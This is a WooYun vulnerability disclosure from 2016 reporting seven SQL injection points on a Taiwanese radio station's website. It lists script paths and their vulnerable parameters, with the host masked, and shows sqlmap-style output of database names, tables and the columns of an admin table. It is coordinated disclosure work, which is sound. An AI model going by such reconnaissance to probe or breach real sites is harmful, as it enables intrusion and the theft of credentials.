当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166218

漏洞标题:羅東廣播電台www主站7处SQL漏洞打包#明文密码#(DBA权限)(臺灣地區)

相关厂商:羅東廣播電台

漏洞作者: 路人甲

提交时间:2016-01-02 04:19

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-02: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

RT

详细说明:

羅東廣播電台
站点地址:

http://**.**.**.**


多处SQL漏洞
一、

http://**.**.**.**/news.php?id=44&mode=news_view
参数:id


SQL-1.png


二、

http://**.**.**.**/schedule.php?mode=schedule_list&type=1
参数:type


SQL-20.png


三、

http://**.**.**.**/order.php?id=20&mode=order_post
参数id


SQL-10.png

SQL-11.png


四、

http://**.**.**.**/search.php?mode=search_list&keyword=2015&type=1&submit.x=10&submit.y=21
参数:keyword


SQL-30.png


五、

http://**.**.**.**/event.php?id=&mode=event_view
参数:id


SQL-40.png


六、

http://**.**.**.**/program.php?mode=program_list&type=5
参数:type
http://**.**.**.**/program.php?id=373&mode=program_view
参数:id


SQL-50.png


七、

http://**.**.**.**/blog/hans58351238/blog.php?id=23&mode=blog_view
参数:id


SQL-60.png

SQL-61.png


=======================================================
数据库信息证明

SQL-6.png


当前库、用户、DBA和数据库:

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
current user:    'root@localhost'
current database:    'lotung'
current user is DBA:    True
available databases [5]:
[*] information_schema
[*] lotung
[*] mysql
[*] tarman
[*] test


28张表:

SQL-3.png


Database: lotung
[28 tables]
+-----------------+
| about           |
| admins          |
| admins_log      |
| banner          |
| banner_type     |
| blog            |
| blog_news_post  |
| blog_news_type  |
| blog_post       |
| blog_reply      |
| blog_type       |
| contact         |
| counter_log     |
| event           |
| event_type      |
| host            |
| host_type       |
| jukebox         |
| marquee         |
| marquee_type    |
| member          |
| news            |
| news_type       |
| program         |
| program_type    |
| schedule        |
| schedule_type   |
| website_counter |
+-----------------+


表admins字段

SQL-2.png


Database: lotung
Table: admins
[14 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| admin_account  | varchar(120) |
| admin_blog_id  | int(10)      |
| admin_connect  | int(10)      |
| admin_email    | varchar(120) |
| admin_id       | int(10)      |
| admin_level    | varchar(25)  |
| admin_nickname | varchar(250) |
| admin_password | varchar(120) |
| admin_photo    | varchar(250) |
| admin_reg_date | datetime     |
| admin_status   | int(1)       |
| admin_title    | varchar(250) |
| admin_type     | int(5)       |
| admin_update   | datetime     |
+----------------+--------------+


部分数据证明,明文密码

SQL-4.png


整理一下

SQL-5.png


可跨库。。。
未深入

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2016-01-04 13:18

厂商回复:

感謝通報

最新状态:

暂无

漏洞评价:

评价